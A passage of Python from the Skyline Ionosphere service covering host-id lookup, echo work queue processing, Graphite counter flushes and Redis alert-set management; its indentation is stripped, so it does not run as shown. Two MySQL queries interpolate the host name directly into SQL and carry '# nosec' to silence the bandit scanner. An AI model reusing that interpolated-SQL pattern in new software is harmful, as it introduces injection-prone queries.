# @added 20170916 - Feature #1996: Ionosphere - matches page
# Create the ionosphere_summary_memcache_object
# @modified 20180103 - Feature #1996: Ionosphere - matches page
# The ionosphere_summary_list memcache object is not managed in
# ionosphere.py and was an artefact of some dev work that may
# resume at some point
# if settings.MEMCACHE_ENABLED:
# try:
# logger.info('updating the ionosphere_summary_memcache_object')
# self.update_ionosphere_summary_memcache_object
# except:
# logger.error('error :: update_ionosphere_summary_memcache_object - %s' % traceback.print_exc())
# self.populate the database metadata tables
# What is my host id in the Skyline panorama DB?
host_id = False
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# Check memcached before MySQL
if settings.MEMCACHE_ENABLED:
hosts_id_key = 'hosts.id.%s' % this_host
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# host_id = self.memcache_client.get(hosts_id_key)
if python_version == 2:
host_id = self.memcache_client.get(hosts_id_key)
else:
host_id = self.memcache_client.get(hosts_id_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not raise an exception
except:
logger.error('error :: failed to get %s from memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if host_id:
logger.info('using memcache %s key data' % hosts_id_key)
logger.info('host_id: %s' % str(host_id))
if not host_id:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id FROM hosts WHERE host=\'%s\'' % this_host # nosec
results = mysql_select(skyline_app, query)
if results:
host_id = results[0][0]
logger.info('host_id: %s' % str(host_id))
else:
logger.info('failed to determine host id of %s' % this_host)
if host_id and settings.MEMCACHE_ENABLED:
try:
self.memcache_client.set(hosts_id_key, int(host_id))
logger.info('populated memcache %s key' % hosts_id_key)
except:
logger.error('error :: failed to set %s in memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# if not known - INSERT hostname INTO host
if not host_id:
logger.info('inserting %s into hosts table' % this_host)
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'insert into hosts (host) VALUES (\'%s\')' % this_host # nosec
host_id = self.mysql_insert(query)
if host_id:
logger.info('new host_id: %s' % str(host_id))
if not host_id:
logger.error(
'error :: failed to determine or populate %s into the hosts table' %
this_host)
sleep(30)
continue
"""
Determine if any metric check files have been added to process
"""
# while True:
while 1:
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Process the ionosphere.echo.work queue as echo features
# profiles cannot be easily shoehorned into the
# ionosphere.learn.work pipeline
try:
ionosphere_echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
ionosphere_echo_enabled = False
echo_job = False
if not metric_var_files and ionosphere_echo_enabled:
ionosphere_echo_work = None
echo_job = False
try:
ionosphere_echo_work = self.redis_conn_decoded.smembers('ionosphere.echo.work')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.echo.work - %s' % e)
if ionosphere_echo_work:
echo_work_queue_items = len(ionosphere_echo_work)
if echo_work_queue_items > 0:
echo_job = True
logger.info('processing an ionosphere.echo.work item')
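# Note: each ionosphere.echo.work item is the string representation of
# a list - index 2 is the metric timestamp, index 3 the base_name and
# index 6 the full_duration, as unpacked below.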
if echo_job:
for index, ionosphere_echo_work in enumerate(ionosphere_echo_work):
try:
echo_metric_list = literal_eval(ionosphere_echo_work)
echo_metric_timestamp = int(echo_metric_list[2])
echo_base_name = str(echo_metric_list[3])
echo_full_duration = int(echo_metric_list[6])
break
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from ionosphere_echo_work item')
continue
if not echo_base_name:
echo_job = False
if echo_job:
# When an item is in the ionosphere.echo.work set it needs
# metric_echo_check_file created to pass to process_ionosphere_echo
echo_metric_check_file = '%s/%s.%s.echo.txt' % (
settings.SKYLINE_TMP_DIR, str(echo_metric_timestamp),
echo_base_name)
echo_create_fp_metric_key = 'ionosphere.%s.%s.echo_create_check' % (
str(echo_metric_timestamp), echo_base_name)
echo_create_fp_metric_count = 1
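# Note: the echo_create_check Redis key counts creation attempts for
# this metric and timestamp so that a failing echo features profile
# creation is abandoned after 3 attempts rather than retried endlessly.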
try:
echo_create_fp_metric_count = self.redis_conn.get(echo_create_fp_metric_key)
except Exception as e:
logger.error('error :: could not query Redis for %s: %s' % (echo_create_fp_metric_key, e))
if not echo_create_fp_metric_count:
echo_create_fp_metric_count = 1
else:
echo_create_fp_metric_count = int(echo_create_fp_metric_count) + 1
if os.path.isfile(str(echo_metric_check_file)):
logger.error('error :: echo_metric_check_file - %s already exists, removing' % (
echo_metric_check_file))
self.remove_metric_check_file(echo_metric_check_file)
if echo_create_fp_metric_count >= 3:
logger.error('error :: echo_create_fp_metric_count is %s, no further attempts will be made to create an echo fp for %s' % (
str(echo_create_fp_metric_count), str(echo_metric_list)))
logger.info('removing ionosphere.echo.work item %s' % (
str(echo_metric_list)))
work_set = 'ionosphere.echo.work'
try:
self.redis_conn.srem(work_set, str(echo_metric_list))
logger.info('removed work item - %s - from Redis set - %s' % (str(echo_metric_list), work_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove work item list from Redis set - %s' % work_set)
echo_job = False
if echo_job:
check_data = 'metric = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'added_by = \'%s\'\n' \
'full_duration = \'%s\'\n' \
% (str(echo_base_name), str(echo_metric_timestamp),
'webapp', str(echo_full_duration))
echo_metric_check_file_created = False
try:
write_data_to_file(skyline_app, echo_metric_check_file, 'w', check_data)
logger.info('added ionosphere.echo.work item check file for process_ionosphere_echo - %s' % (
echo_metric_check_file))
echo_metric_check_file_created = True
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add ionosphere.echo.work item check file for process_ionosphere_echo - %s' % (
echo_metric_check_file))
if echo_metric_check_file_created:
# Set a Redis key so that if the echo fp creation fails
# a continuous loop to try to create it does not occur
try:
self.redis_conn.setex(echo_create_fp_metric_key, 3600, echo_create_fp_metric_count)
logger.info('updated Redis key %s' % echo_create_fp_metric_key)
except:
logger.error('error :: failed to update Redis key %s' % echo_create_fp_metric_key)
# Spawn a single process_ionosphere_echo process
function_name = 'process_ionosphere_echo'
pids = []
spawned_pids = []
pid_count = 0
now = time()
for i in range(1, IONOSPHERE_PROCESSES + 1):
try:
p = Process(target=self.process_ionosphere_echo, args=(i, echo_metric_check_file))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s for ionosphere.echo.work item' % (
str(pid_count), str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s for ionosphere.echo.work item' % function_name)
continue
# Self monitor the process and terminate if the
# process_ionosphere_echo has run for too long
try:
ionosphere_echo_max_fp_create_time = settings.IONOSPHERE_ECHO_MAX_FP_CREATE_TIME
except:
ionosphere_echo_max_fp_create_time = 55
p_starts = time()
while time() - p_starts <= ionosphere_echo_max_fp_create_time:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds for ionosphere.echo.work item' % (
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
work_set = 'ionosphere.echo.work'
try:
self.redis_conn.srem(work_set, str(echo_metric_list))
logger.info('removed work item - %s - from Redis set - %s' % (str(echo_metric_list), work_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove work item list from Redis set - %s' % work_set)
self.remove_metric_check_file(echo_metric_check_file)
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes for ionosphere.echo.work item' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process for ionosphere.echo.work item' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes for ionosphere.echo.work item' % function_name)
if not metric_var_files:
logger.info('sleeping 20 no metric check files')
sleep(20)
up_now = time()
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, up_now)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
# Manage the ionosphere.unique_metrics Redis set which is queried
# by Analyzer and Mirage, yes and we use multiprocessing
last_update = None
try:
last_update = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics: %s' % e)
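# Note: manage_ionosphere_unique_metrics is only spawned when the
# ionosphere.manage_ionosphere_unique_metrics Redis key is not present,
# which throttles how often the ionosphere.unique_metrics set is managed.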
if not last_update:
pids = []
now = time()
try:
logger.info('starting manage_ionosphere_unique_metrics process')
p = Process(target=self.manage_ionosphere_unique_metrics)
pids.append(p)
p.start()
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to start manage_ionosphere_unique_metrics')
# Self monitor process and terminate if run for too long
p_starts = time()
# @modified 20200507 - increase the allowed time
# while time() - p_starts <= 5:
while time() - p_starts <= 20:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'manage_ionosphere_unique_metrics completed in %.2f seconds' % (
time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing manage_ionosphere_unique_metrics process' % (skyline_app))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('%s :: killed manage_ionosphere_unique_metrics process' % (skyline_app))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all manage_ionosphere_unique_metrics processes')
# Discover metric anomalies to insert
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
logger.info('metric check files found - %s' % str(len(metric_var_files)))
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20170104 - Feature #1842: Ionosphere - Graphite now graphs
# Task #1658: Patterning Skyline Ionosphere
# Send Ionosphere metrics to Graphite every minute now that
# Ionosphere is better tuned and Reset lists
cache_key = '%s.sent_graphite_metrics' % skyline_app
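# Note: Ionosphere graphite metrics are flushed at most once per minute,
# the <skyline_app>.sent_graphite_metrics Redis key is set with a 59
# second TTL after a flush and no flush is done while it exists.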
redis_sent_graphite_metrics = False
try:
redis_sent_graphite_metrics = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for key %s: %s' % (cache_key, e))
# Flush metrics to Graphite
if not redis_sent_graphite_metrics:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# not_anomalous = str(len(self.not_anomalous))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# not_anomalous = str(len(list(self.redis_conn.smembers('ionosphere.not_anomalous'))))
not_anomalous = str(len(list(self.redis_conn_decoded.smembers('ionosphere.not_anomalous'))))
except:
not_anomalous = '0'
logger.info('not_anomalous :: %s' % not_anomalous)
send_metric_name = '%s.not_anomalous' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis set instead of Manager() list
# total_anomalies = str(len(self.anomalous_metrics))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# total_anomalies = str(len(list(self.redis_conn.smembers('ionosphere.anomalous_metrics'))))
total_anomalies = str(len(list(self.redis_conn_decoded.smembers('ionosphere.anomalous_metrics'))))
except:
total_anomalies = '0'
logger.info('total_anomalies :: %s' % total_anomalies)
send_metric_name = '%s.total_anomalies' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, total_anomalies)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# training_metrics = str(len(self.training_metrics))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# training_metrics = str(len(list(self.redis_conn.smembers('ionosphere.training_metrics'))))
training_metrics = str(len(list(self.redis_conn_decoded.smembers('ionosphere.training_metrics'))))
except:
training_metrics = '0'
logger.info('training metrics :: %s' % training_metrics)
send_metric_name = '%s.training_metrics' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, training_metrics)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# features_profiles_checked = str(len(self.features_profiles_checked))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# features_profiles_checked = str(len(list(self.redis_conn.smembers('ionosphere.features_profiles_checked'))))
features_profiles_checked = str(len(list(self.redis_conn_decoded.smembers('ionosphere.features_profiles_checked'))))
except:
features_profiles_checked = '0'
logger.info('fps checked count :: %s' % features_profiles_checked)
send_metric_name = '%s.fps_checked' % skyline_app_graphite_namespace
# @modified 20170306 - Feature #1960: ionosphere_layers
# Corrected namespace
# send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
send_graphite_metric(skyline_app, send_metric_name, features_profiles_checked)
# @added 20170306 - Feature #1960: ionosphere_layers
try:
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = str(len(self.layers_checked))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# str_layers_checked = str(len(self.layers_checked))
str_layers_checked = str(len(list(self.redis_conn.smembers('ionosphere.layers_checked'))))
except:
str_layers_checked = '0'
logger.info('layers checked count :: %s' % str_layers_checked)
send_metric_name = '%s.layers_checked' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str_layers_checked)
if settings.PANORAMA_ENABLED:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# sent_to_panorama = str(len(self.sent_to_panorama))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# sent_to_panorama = str(len(list(self.redis_conn.smembers('ionosphere.sent_to_panorama'))))
sent_to_panorama = str(len(list(self.redis_conn_decoded.smembers('ionosphere.sent_to_panorama'))))
except:
sent_to_panorama = '0'
logger.info('sent_to_panorama :: %s' % sent_to_panorama)
send_metric_name = '%s.sent_to_panorama' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_panorama)
sent_graphite_metrics_now = int(time())
try:
self.redis_conn.setex(cache_key, 59, sent_graphite_metrics_now)
logger.info('updated Redis key - %s' % cache_key)
except:
logger.error('error :: failed to update Redis key - %s up' % cache_key)
# Reset lists
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.anomalous_metrics[:] = []
# self.not_anomalous[:] = []
# self.features_profiles_checked[:] = []
# self.training_metrics[:] = []
# self.sent_to_panorama[:] = []
# @added 20170306 - Feature #1960: ionosphere_layers
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.layers_checked[:] = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
delete_redis_sets = [
'ionosphere.anomalous_metrics',
'ionosphere.not_anomalous',
'ionosphere.features_profiles_checked',
'ionosphere.training_metrics',
'ionosphere.sent_to_panorama',
'ionosphere.layers_checked',
]
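# Note: these per run counter sets are deleted after each Graphite flush
# so that the counts reported above only cover the current reporting
# period.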
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
ionosphere_job = False
learn_job = False
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if the namespace is a declared SKYLINE_FEEDBACK_NAMESPACES
# namespace that has been checked in the last 10 minutes if
# there are multiple checks to do.
rate_limit_feedback_metrics = False
if metric_var_files:
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, str(metric_var_files_sorted[0]))
metric_var_files_count = len(metric_var_files_sorted)
if metric_var_files_count > 2:
rate_limit_feedback_metrics = True
logger.info('rate_limit_feedback_metrics set to %s' % (str(rate_limit_feedback_metrics)))
if rate_limit_feedback_metrics:
for i_metric_check_file in metric_var_files_sorted:
feedback_metric = False
check_metric_file_list = i_metric_check_file.split('.', -1)[1:]
last_name_element = len(check_metric_file_list) - 1
base_name = '.'.join(check_metric_file_list[0:last_name_element])
metric_namespace_elements = base_name.split('.')
for to_skip in SKYLINE_FEEDBACK_NAMESPACES:
if to_skip in base_name:
feedback_metric = True
logger.info('SKYLINE_FEEDBACK_NAMESPACES matched on to_skip %s in base_name %s' % (to_skip, base_name))
break
to_skip_namespace_elements = to_skip.split('.')
elements_matched = set(metric_namespace_elements) & set(to_skip_namespace_elements)
if len(elements_matched) == len(to_skip_namespace_elements):
feedback_metric = True
logger.info('SKYLINE_FEEDBACK_NAMESPACES matched elements in %s' % base_name)
break
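# For illustration only (hypothetical settings value): with
# SKYLINE_FEEDBACK_NAMESPACES = ['skyline', 'carbon'] a check for a
# metric such as skyline.ionosphere.checks.done would be classed as a
# feedback metric here, either by the substring match or by the
# namespace element match above.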
if feedback_metric:
remove_feedback_metric_check = False
if metric_var_files_count > 4:
logger.info('rate limiting feedback metric, removing check for %s as Ionosphere has %s pending checks, not checking feedback metric' % (
base_name, str(metric_var_files_count)))
remove_feedback_metric_check = True
cache_key = 'ionosphere.feedback_metric.checked.%s' % (base_name)
check_done = False
try:
check_done = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not check_done:
logger.info('not removing feedback metric as no check has been done in last 600 seconds on %s' % base_name)
remove_feedback_metric_check = False
else:
logger.info('rate limiting feedback metric, removing check as %s has been checked in the last 600 seconds' % (
base_name))
remove_feedback_metric_check = True
if remove_feedback_metric_check:
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, i_metric_check_file)
# @added 20200907 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
redis_set = 'analyzer.waterfall_alerts.sent_to_ionosphere'
metric_check_file_timestamp = i_metric_check_file.split('.', -1)[0]
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_check_file_timestamp):
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed feedback metric waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove feedback metric waterfall alert item for %s from Redis set %s' % (
base_name, redis_set))
redis_set = 'mirage.waterfall_alerts.sent_to_ionosphere'
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_check_file_timestamp):
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed feedback metric waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove feedback metric waterfall alert item for %s from Redis set %s' % (
base_name, redis_set))
self.remove_metric_check_file(str(metric_check_file))
# Determine metric_var_files after possible feedback metric removals
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20200414 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Prioritise realtime metric checks over analyzer_batch checks
# as if a lot of anomalies are submitted from analyzer_batch
# and they are processed first then real time metrics waiting to
# be processed could exceed the max_age_seconds time limit. Batch
# anomalies are not subject to the max_age_seconds check,
# therefore they will get done in due course.
prioritise_realtime_checks = True
remove_batch_anomalies_check_files = []
realtime_metric_var_files_count = 0
batch_metric_var_files_count = 0
# If there are realtime metric anomalies and batch metric
# anomalies prioritise the realtime checks by removing the
# batch anomaly checks from the metric_var_files
if metric_var_files and prioritise_realtime_checks and BATCH_PROCESSING:
if rate_limit_feedback_metrics:
prioritise_realtime_checks = False
logger.info('prioritise_realtime_checks set to %s' % (str(prioritise_realtime_checks)))
try:
metric_var_files_sorted = []
if metric_var_files:
metric_var_files_sorted = sorted(metric_var_files)
# logger.info('prioritise_realtime_checks checking %s metrics for batch anomalies' % (str(len(metric_var_files_sorted))))
for i_metric_check_file in metric_var_files_sorted:
analyzer_batch_anomaly = None
check_file_anomaly_timestamp = None
try:
check_metric_file_list = i_metric_check_file.split('.', -1)[1:]
last_name_element = len(check_metric_file_list) - 1
base_name = '.'.join(check_metric_file_list[0:last_name_element])
i_metric_check_filename = i_metric_check_file.replace(settings.IONOSPHERE_CHECK_PATH + '/', '')
check_file_anomaly_timestamp = i_metric_check_filename.split('.', 1)[0]
except Exception as e:
logger.error('error :: could not determine anomaly_timestamp from filename %s - %s' % (
i_metric_check_file, str(e)))
check_file_anomaly_timestamp = None
# Is this an analyzer_batch related anomaly
if check_file_anomaly_timestamp:
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(check_file_anomaly_timestamp), base_name)
try:
analyzer_batch_anomaly = self.redis_conn.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('batch processing - identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
remove_batch_anomalies_check_files.append(i_metric_check_file)
batch_metric_var_files_count += 1
else:
realtime_metric_var_files_count += 1
# logger.info('batch processing - no batch anomaly Redis key found - %s' % analyzer_batch_metric_anomaly_key)
# @added 20200414 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# If there are realtime metric anomalies and batch metric
# anomalies prioritise the realtime checks by removing the
# batch anomaly checks from the metric_var_files
realtime_metric_var_files = []
if realtime_metric_var_files_count > 0:
if remove_batch_anomalies_check_files:
for metric_var_file in metric_var_files_sorted:
if metric_var_file in remove_batch_anomalies_check_files:
logger.info('removing batch anomaly check file to prioritise realtime metric checks - %s' % str(metric_var_file))
else:
realtime_metric_var_files.append(metric_var_file)
if realtime_metric_var_files:
realtime_metric_var_files_count = len(realtime_metric_var_files)
metric_var_files = realtime_metric_var_files
logger.info('removed %s batch anomaly check files from metric_var_files list to prioritise the %s realtime metric checks' % (
str(batch_metric_var_files_count),
str(realtime_metric_var_files_count)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine batch anomalies')
if metric_var_files:
ionosphere_job = True
logger.info('%s metric check files, so set to ionosphere_job = True' % (str(len(metric_var_files))))
break
# @added 20170113 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
work_queue_items = 0
if settings.IONOSPHERE_LEARN:
learn_work = None
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# learn_work = self.redis_conn.smembers('ionosphere.learn.work')
learn_work = self.redis_conn_decoded.smembers('ionosphere.learn.work')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.learn.work - %s' % e)
if learn_work:
work_queue_items = len(learn_work)
if work_queue_items > 0:
learn_job = True
if learn_job:
break
# @added 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Do not run Ionosphere and echo checks on a metric when a lot of
# checks are being done. Manage the Ionosphere load and increased
# runtime in general that Ionosphere echo has introduced, especially
# when Ionosphere is issued lots of checks, if lots of metrics suddenly
# become anomalous.
metric_var_files_count = 0
ionosphere_busy = False
if ionosphere_job:
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, str(metric_var_files_sorted[0]))
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added a count of the number of checks to be done
metric_var_files_count = len(metric_var_files)
# If there are more than 4 metric check files set Ionosphere to
# busy so that Ionosphere alternates between checking the normal
# Ionosphere Mirage features profiles and the Ionosphere echo
# features profiles on subsequent checks of a metric so that
# when Ionosphere is busy it is not checking both sets of
# features profiles on every run.
if metric_var_files_count > 4:
ionosphere_busy = True
# @added 20170108 - Feature #1830: Ionosphere alerts
# Adding lists of smtp_alerter_metrics and ionosphere_non_smtp_alerter_metrics
# Timed this takes 0.013319 seconds on 689 unique_metrics
unique_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
unique_metrics = list(self.redis_conn_decoded.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get the unique_metrics list from Redis')
unique_metrics = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# The Redis analyzer.smtp_alerter_metrics list is created here to
# replace the self.ionosphere_smtp_alerter_metrics Manager.list in the below
# section
ionosphere_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
ionosphere_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_smtp_alerter_metrics Redis set')
ionosphere_smtp_alerter_metrics = []
redis_sets_to_rename = [
'ionosphere.ionosphere_smtp_alerter_metrics',
'ionosphere.ionosphere_non_smtp_alerter_metrics'
]
for current_redis_set in redis_sets_to_rename:
new_redis_set = '%s.old' % current_redis_set
try:
self.redis_conn.rename(current_redis_set, new_redis_set)
except Exception as e:
if str(e) == 'no such key':
logger.info('could not rename Redis set %s to %s: %s' % (
current_redis_set, new_redis_set, str(e)))
else:
logger.error('error :: could not rename Redis set %s to %s: %s' % (
current_redis_set, new_redis_set, str(e)))
for metric_name in unique_metrics:
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
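# Note: the loop below classifies each unique metric by whether it
# matches an smtp alert in settings.ALERTS (by regex first, then by
# substring) and populates the ionosphere.ionosphere_smtp_alerter_metrics
# and ionosphere.ionosphere_non_smtp_alerter_metrics Redis sets
# accordingly.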
for alert in settings.ALERTS:
pattern_match = False
if str(alert[1]) == 'smtp':
ALERT_MATCH_PATTERN = alert[0]
METRIC_PATTERN = base_name
pattern_match = False
try:
# Match by regex
alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
pattern_match = alert_match_pattern.match(METRIC_PATTERN)
if pattern_match:
pattern_match = True
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
if base_name not in ionosphere_smtp_alerter_metrics:
# self.ionosphere_smtp_alerter_metrics.append(base_name)
redis_set = 'ionosphere.ionosphere_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
pattern_match = False
if not pattern_match:
# Match by substring
if alert[0] in base_name:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# self.ionosphere_smtp_alerter_metrics.append(base_name)
if base_name not in ionosphere_smtp_alerter_metrics:
redis_set = 'ionosphere.ionosphere_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# self.ionosphere_non_smtp_alerter_metrics.append(base_name)
if base_name not in ionosphere_smtp_alerter_metrics:
redis_set = 'ionosphere.ionosphere_non_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
